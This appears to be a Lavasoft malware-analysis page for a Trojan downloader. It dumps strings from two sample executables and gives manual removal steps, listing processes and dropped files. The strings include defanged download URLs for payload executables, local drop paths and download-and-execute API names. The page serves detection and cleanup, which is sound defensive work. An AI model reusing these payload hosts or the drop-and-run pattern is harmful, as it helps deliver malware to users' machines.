<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>PAD
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
comdlg32.dll
GDI32.dll
ole32.dll
OLEAUT32.dll
RASAPI32.dll
SHELL32.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
(*.*)
1.0.0.0
(hXXp://VVV.eyuyan.com)

%original file name%.exe_400_rwx_00401000_00123000:

t$(SSh
~%UVW
u$SShe
hXXp://xiazai.lianmengqudao1.com:1227/down/u.php?d=yunbo_53_1248.exe
C:\syunbo_53_1248.exe
hXXp://VVV.jiuhuabuy.com/kuplay/930/871248/
C:\jufilo_930_871248.exe
#ÿf
H.Xli
\v.rFc
!2.mf
;:t%s
`pI
f<d
)%Y%C/j\
.vwuW
`.csh-[~
.nl!&q
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
.PAVCException@@
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
.PAVCFileException@@
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
.PAVCNotSupportedException@@
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
WinExec
GetProcessHeap
GetCPInfo
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
GetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
ShellExecuteA
GetKeyState
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
.text
`.rdata
@.data
.rsrc

syunbo_53_1248.exe_1300:

.text
`.rdata
@.data
.rsrc
@.reloc
8%u*@Sj%
t.Gj:W
Whd%F
j.Yf;
_tcPVj@
w$hT%F
.PjRW
Internal error clearing splay node = %d
Internal error removing splay node = %d
Could not resolve %s: %s
init_resolve_thread() failed for %s; %s
getaddrinfo() failed for %s:%d; %s
%s:%d
Hostname %s was found in DNS cache
Connected to %s (%s) port %ld (#%ld)
smtp
;type=%c
Send failure: %s
Write callback asked for PAUSE when not supported!
[%s %s %s]
Failed to set SO_KEEPALIVE on fd %d
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d
Couldn't bind to interface '%s'
Local Interface %s is ip %s using address family %i
Name '%s' family %i resolved to '%s' family %i
Couldn't bind to '%s'
getsockname() failed with errno %d: %s
Local port: %hu
Bind to local port %hu failed, trying next
bind failed with errno %d: %s
getpeername() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
connect to %s port %ld failed: %s
Failed to connect to %s port %ld: %s
Could not set TCP_NODELAY: %s
TCP_NODELAY set
sa_addr inet_ntop() failed with errno %d: %s
Trying %s...
Immediate connect fail for %s: %s
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Referer: %s
Accept-Encoding: %s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
Range: bytes=%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s=%s
Internal HTTP POST error!
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
operation aborted by callback
Read callback asked for PAUSE when not supported!
seek callback returned error %d
the ioctl callback returned %d
ioctl callback returned error %d
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
@Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
d:d:d
d:d
0123456789
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
FTP: command PORT failed
FTP: command REST failed
Operation was aborted by an application callback
A libcurl function was given a bad argument
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
SSL server certificate status verification FAILED
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
Unknown error %d (%#x)
%d.%d.%d.%d
CLIENT libcurl 7.44.0-DEV
MATCH %s %s %s
DEFINE %s %s
WSAStartup failed (%d)
insufficient winsock version to support telnet
%s IAC %s
%s IAC %d
%s %s %s
%s %s %d
%s %d %d
Sending data failed (%d)
%s IAC SB
%s (unsupported)
%d (unknown)
USER,%s
7[^= ]%*[ =]%5s
Syntax error in telnet option: %s
Unknown telnet option %s
%c%c%c%c%s%c%c
%c%c%c%c
7[^,],7s
%c%s%c%s
WS2_32.DLL
failed to load WS2_32.DLL (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEnumNetworkEvents function (%d)
WSACreateEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACloseEvent failed (%d)
FreeLibrary(wsock2) failed (%d)
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
got option=(%s) value=(%s)
blksize is larger than max supported
%s (%d)
blksize is smaller than min supported
%s (%ld)
%s (%d) %s (%d)
invalid tsize -:%s:- value in OACK packet
%s%c%s%c
tftp_send_first: internal error
Received last DATA packet block %d again.
Received unexpected DATA packet block %d, expecting block %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: internal error
Received ACK for block %d, expecting %d
tftp_tx: giving up waiting for block %d ack
tftp_tx: internal error, event: %i
TFTP finished
bind() failed; %s
TFTP response timeout
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: %s
LDAP local: trying to establish %s connection
LDAP local: Cannot connect to %s:%ld
LDAP local: ldap_simple_bind_s %s
LDAP remote: %s
There are more than %d entries
LOGIN %s %s
AUTHENTICATE %s %s
AUTHENTICATE %s
No known authentication mechanisms supported!
LIST "%s" *
SELECT %s
FETCH %s BODY[%s]<%s>
FETCH %s BODY[%s]
APPEND %s (\Seen) {%I64d}
SEARCH %s
LOGINDISABLED
STARTTLS not supported.
STARTTLS denied. %c
Access denied. %c
IMAPS not supported!
%cd
%s %s
USER %s
APOP %s %s
AUTH %s %s
AUTH %s
STLS not supported.
Authentication failed: %d
PASS %s
POP3S not supported!
SMTP
EHLO %s
HELO %s
MAIL FROM:%s
MAIL FROM:%s AUTH=%s
MAIL FROM:%s AUTH=%s SIZE=%s
MAIL FROM:%s SIZE=%s
RCPT TO:%s
RCPT TO:<%s>
Got unexpected smtp-server response: %d
Remote access denied: %d
Command failed: %d
MAIL failed: %d
RCPT failed: %d
DATA failed: %d
SMTPS not supported!
PORT
Preparing for accepting server on data port
FTP response timeout
FTP response aborted due to select/poll error: %d
CWD %s
getsockname() failed: %s
failed to resolve the address provided to PORT: %s
socket failure: %s
bind(port=%hu) on non-local address failed: %s
bind(port=%hu) failed: %s
bind() failed, we ran out of ports!
%s |%d|%s|%hu|
Failure sending EPRT command: %s
,%d,%d
Failure sending PORT command: %s
Connect data stream passively
PRET %s
PRET STOR %s
PRET RETR %s
REST %d
SIZE %s
%s%s%s
MDTM %s
APPE %s
STOR %s
%c%c%c%u%c
Illegal port number in EPSV reply
%d,%d,%d,%d,%d,%d
Skip %d.%d.%d.%d for data connection, re-use %s instead
Bad PASV/EPSV response: d
Can't resolve proxy host %s:%hu
Can't resolve new host %s:%hu
Failed to do PORT
dddddd
ddd d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
unsupported MDTM reply format
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
RETR %s
Failed FTP upload: 

RETR response: d
PBSZ %d
ACCT %s
Access denied: d
ACCT rejected by server: d
Got a d ftp-server response when 220 was expected
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
PROT %c
Entry path is '%s'
QUOT command failed with d
MKD %s
Failed to MKD dir: d
PRET command not accepted: d
Remembering we are in dir "%s"
Failure sending ABOR command: %s
server did not report OK, got %d
QUOT string not accepted: %s
TYPE %c
Connecting to %s (%s) port %d
ftp_perform ends with SECONDARY: %d
Wildcard - START of "%s"
Wildcard - "%s" skipped by user
Failure sending QUIT command: %s
Uploading to a URL without a file name!
FTPS not supported!
Couldn't open file %s
Can't open %s for writing
Can't get the size of %s
Refusing to issue an RTSP request [%s] without a session ID.
Transport:
Transport: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Range: %s
%s %s RTSP/1.0
Session: %s
%s%s%s%s%s%s
curl
%sAuthorization: Digest %s
%sAuthorization: NTLM %s
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
User was rejected by the SOCKS5 server (%d %d).
SOCKS5 GSSAPI per-message authentication is not supported.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
CONNECT %s HTTP/%s
%s%s%s%s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
.jpeg
.html
; filename="%s"
%s; boundary=%s
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
------------------------xx
%c%c==
%c%c%c=
LOGIN
%s/%s
%s xxxxxxxxxxxxxxxx
00000001
xxxx
username="%s",realm="%s",nonce="%s",cnonce="%s",nc="%s",digest-uri="%s",response=%s,qop=%s
%s:%s:%s
%s:%s:x:%s:%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop=%s, response="%s"
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%s, opaque="%s"
%s, algorithm="%s"
user=%s
auth=Bearer %s
Unsupported SASL authentication mechanism
0123456789-
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
1.2.8
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
operator
GetProcessWindowStation
curl_global_init failed: %d
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Compute Cluster Edition
Microsoft Windows Server 2003 Storage Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 R2 Storage Server
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
EEDTFJDVCLHQJLBOJLDUCLFDJIDVIWCWDUDPCHERBBHHHYDTIPGSFTFVGKCTAYDQIWAFHHERFPGKAYENGPEKHBHICG
EEDTFJDVCLHQJLCHDMGWJUGGEEGNGQFNGYFBFKCNFLITFTBKBMDRIJGYFYIJAUHNIJEBATDIJJIBBECXHOGPJTEKHXJJJOIYJHGJIPBQBOHLFSDNEXEYIRADGREOBVAX
EEDTFJDVCLHQJLCBBIIFHBAEGYDJJIHOGOCVIREVDXJRDHDDCGGSDLDRGQBGHOCIGKBJASICIVGWEBFRHIBGCCCNHSCGAF
EEDTFJDVCLHQJLCHDMGXGUJLCWACAAFYBDJGEICOFTIAHMJGJKGJCVFNIUJGGHAWAIEZBCCOFEAOATEWJHDFAUCTBXIMFODUIXHKDODHIGBLHFGCERIOJUEUDPFEEGHK
SELECT * FROM Win32_OperatingSystem
InternetOpenUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
URLDownloadToFileW
ShellExecuteW
C:\Users\Administrator\Desktop\Q
\Release\nmjh.pdb
WLDAP32.dll
WS2_32.dll
PeekNamedPipe
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
CryptDestroyKey
CryptImportKey
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
IPHLPAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
$XXaa
.chgdggggiijijjjj
7777777777779999999
N7<FCFFFFGFGGIGIIIIIIIIIIKIISKKSKKKSUKKKSUITKITKSKSISISISSHSHSHHHEHEEEDBBBBB@BBBB?B
j7<CFFFGFGFGGIIIIIIIIIISKKSKUKKUKUUUUKUUUUKUUUUUKUKKUSKSKSISSISSSHSHHHEEDEDBBBBBBBB?B?B
?>CFFFGGGGGGIIGIIIIIIIKKKKKKKKK\UKKKK\UK\U\UK\UUUUUUUUUKUSUSKSSISSSHSHHSEEEEEEEBBBBBBBBB?B=???B=?
d7CFGGGFGGGIIIIIIIIIKUKUUUUK\KkK\K\\\\\\\\\\\\\\\\\\UUUUUUUKUSUKTSSSSSSHSHSHHEEEEEBBBBB?BB?BAB??A??
?<DGGGGIIIIIIIIKKKKKKUKUUK\KkKk\\\\\\\`\\^\^\^\^\\^^^\UW\UUWUUUTUKUSKSSSSSHSESEHEEMEEBBBBBBB?BAB
d>DFGGGGIIIIIIKKKKKK\KU\K\\\k\\\\^\^k`^k`k`k`k`k``k^\^^^^W^W\UWUUWUTUUTKSSSSSSHSSSEHEEMEEBBABBAB?B
4444444444
6888888888888888
.. ,.,..,*))
!!""""$"
''&&&&%' <
** 111*'&
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
5&5/5=5:6
4_5o5
7 7$7(7,7
: :$:(:,:0:4:8:
3#363<3[3~3
1"2(2,20242
1(171\1~1
;#</<9<[<
;&<.<;<@<[<`<
6}7
0 0$0(0,000
= =<=@=\=`=
combase.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
2.cmd
kernel32.dll
Gateway:0.0.0.0
c:\Program Files\
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
wininet.dll
Mozilla/4.0 (compatible)
urlmon.dll
VVV.yytv8.com
shell32.dll
%d-%d-%d
%d-%d-%d-%d-%d-%d
C:\syunbo_53_1248.exe
1.0.0.1
YunBOWin.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    setup_30004.exe:2012
    syunbo_53_1248.exe:1300

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\anote\Alarm.wav (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\nsisdl.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskE.tmp (35241 bytes)
    %Program Files%\anote\uninstall.exe (2392 bytes)
    %Program Files%\anote\anote.dat (286 bytes)
    %Program Files%\anote\Language\chinese.ini (2 bytes)
    %Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\жÔØ.lnk (1 bytes)
    %Program Files%\anote\cfg.ini (124 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\¶à²Ê±ãÇ©.lnk (1 bytes)
    %Program Files%\anote\anote.exe (36078 bytes)
    %Program Files%\anote\about.jpg (9 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nszF.tmp\System.dll (11 bytes)
    %Program Files%\anote\anote.dll (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\anote.png (243 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\¶à²Ê±ãÇ©\°ïÖú.lnk (286 bytes)
    C:\syunbo_53_1248.exe (6396 bytes)
    %Program Files%\dBwBAAAAAAAA (207286 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\psb[1].gif (383250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\setup_30004[1].exe (81171 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Program Files%\setup_30004.exe (34350 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now